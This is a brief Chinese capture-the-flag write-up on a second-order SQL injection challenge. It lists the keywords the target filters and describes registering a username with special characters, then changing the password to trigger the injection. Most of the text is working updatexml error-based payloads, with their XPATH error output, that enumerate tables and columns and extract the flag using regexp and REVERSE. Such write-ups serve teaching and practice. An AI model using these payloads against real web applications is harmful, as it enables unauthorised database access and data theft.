Fuzz 测试 过滤: and insert ascii substr left rigth sleep floor < like /**/ %20 思路: 注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果 爆破: admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1 用户: admin"or(updatexml('~',concat('~',database(),'~'),'~'))or"1 XPATH syntax error: '~web_sqli~' 表: admin"or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),'~'),'~'))or"1 XPATH syntax error: '~article,flag,users~' 列: admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),'~'),'~'))or"1 admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),'~'),'~'))or"1 XPATH syntax error: '~flag~' name,pwd,email,real_flag_1s_her ereh_s1_galf_laer,liame,dwp,ema flag admin"or(updatexml('~',concat('~',(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1 admin"or(updatexml('~',concat('~',(select(REVERSE(GROUP_CONCAT(real_flag_1s_here)))from(web_sqli.users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
上面是自己研究的一些思路和姿势,以及写题的流程。
题目的考点是二次注入,报错注入,sql正则函数,reverse()函数。